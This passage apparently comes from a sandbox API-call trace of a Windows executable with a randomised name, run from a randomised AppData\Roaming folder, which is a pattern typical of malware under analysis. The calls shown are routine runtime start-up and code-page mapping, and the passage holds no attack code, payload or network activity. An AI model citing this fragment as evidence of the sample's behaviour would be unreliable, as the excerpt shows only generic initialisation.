lpTitle="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0093.492] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0093.493] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0093.493] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0093.493] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0093.493] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0093.493] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0093.494] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0093.494] GetCurrentThreadId () returned 0xad0 [0093.494] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x1c07d0)) [0093.494] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0093.494] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0093.494] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0093.494] SetHandleCount (uNumber=0x20) returned 0x20 [0093.494] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0093.494] GetEnvironmentStringsW () returned 0x67faf0* [0093.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0093.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x1c11f8, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0093.494] FreeEnvironmentStringsW (penv=0x67faf0) returned 1 [0093.494] GetLastError () returned 0x5 [0093.495] SetLastError (dwErrCode=0x5) [0093.495] GetLastError () returned 0x5 [0093.495] SetLastError (dwErrCode=0x5) [0093.495] GetLastError () returned 0x5 [0093.495] SetLastError (dwErrCode=0x5) [0093.495] GetACP () returned 0x4e4 [0093.495] GetLastError () returned 0x5 [0093.495] SetLastError (dwErrCode=0x5) [0093.495] IsValidCodePage (CodePage=0x4e4) returned 1 [0093.495] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0093.495] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0093.495] GetLastError () returned 0x5 [0093.495] SetLastError (dwErrCode=0x5) [0093.495] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0093.495] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0093.495] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0093.496] GetLastError () returned 0x5 [0093.496] SetLastError (dwErrCode=0x5) [0093.496] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0093.496] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ螩ࠑശAĀ") returned 256 [0093.496] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ螩ࠑശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0093.496] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 
!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ螩ࠑശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0093.496] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x0b\xa9\xce\x09\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0093.496] GetLastError () returned 0x5 [0093.496] SetLastError (dwErrCode=0x5) [0093.496] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0093.496] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ螩ࠑശAĀ") returned 256 [0093.496] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ螩ࠑശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0093.496] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ螩ࠑശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0093.496] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x0
5\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf
9\xfa\xfb\xfc\xfd\xfe\xff\x0b\xa9\xce\x09\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0093.496] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x421940, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe")) returned 0x3a [0093.496] GetLastError () returned 0x0 [0093.496] SetLastError (dwErrCode=0x0) [0093.496] GetLastError () returned 0x0 [0093.496] SetLastError (dwErrCode=0x0) [0093.496] GetLastError () returned 0x0 [0093.496] SetLastError (dwErrCode=0x0) [0093.496] GetLastError () returned 0x0 [0093.496] SetLastError (dwErrCode=0x0) [0093.496] GetLastError () returned 0x0 [0093.496] SetLastError (dwErrCode=0x0) [0093.496] GetLastError () returned 0x0 [0093.496] SetLastError (dwErrCode=0x0) [0093.496] GetLastError () returned 0x0 [0093.496] SetLastError (dwErrCode=0x0) [0093.496] GetLastError () returned 0x0 [0093.496] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 
[0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.497] SetLastError (dwErrCode=0x0) [0093.497] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.498] SetLastError (dwErrCode=0x0) [0093.498] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 [0093.499] SetLastError (dwErrCode=0x0) [0093.499] GetLastError () returned 0x0 
